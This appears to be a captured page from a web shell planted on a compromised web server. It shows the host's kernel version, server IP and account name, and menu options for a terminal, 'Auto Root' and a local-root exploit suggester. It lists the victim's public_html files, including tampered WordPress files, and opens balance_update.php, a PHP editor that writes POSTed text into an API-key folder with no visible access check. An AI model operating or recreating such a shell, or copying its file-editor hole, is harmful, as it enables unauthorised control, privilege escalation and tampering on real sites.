Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.9
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
custom-js /
Delete
Unzip
Name
Size
Permission
Date
Action
bootstrap-datepicker
[ DIR ]
drwxr-xr-x
2025-09-13 02:38
light
[ DIR ]
drwxr-xr-x
2025-09-13 02:50
simple-line-icons
[ DIR ]
drwxr-xr-x
2025-09-13 00:42
ti-icons
[ DIR ]
drwxr-xr-x
2025-09-13 01:56
typeahead.js
[ DIR ]
drwxr-xr-x
2025-09-13 00:42
balance_update.php
622
B
-rw-r--r--
2024-11-09 07:20
htaccess.txt
120
B
-rw-r--r--
2025-08-21 08:56
wp-blog-header-20250913025224.php
0
B
-rw-r--r--
2025-09-12 19:14
wp-blog-header.php
0
B
-rw-r--r--
2025-09-12 19:14
wp-cron-20250913025230.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
Save
Rename
<?php include_once("header.php"); $file_path = '../api_key/deduction_amount.txt'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $new_content = $_POST['file_content']; file_put_contents($file_path, $new_content); echo "File has been updated successfully!"; } $content = file_exists($file_path) ? file_get_contents($file_path) : ''; ?> <h2>Text File Editor</h2> <form method="POST"> <textarea name="file_content" rows="10" cols="50"><?php echo htmlspecialchars($content); ?></textarea><br> <button type="submit">Save Changes</button> </form> <?php include_once("footer.php");?>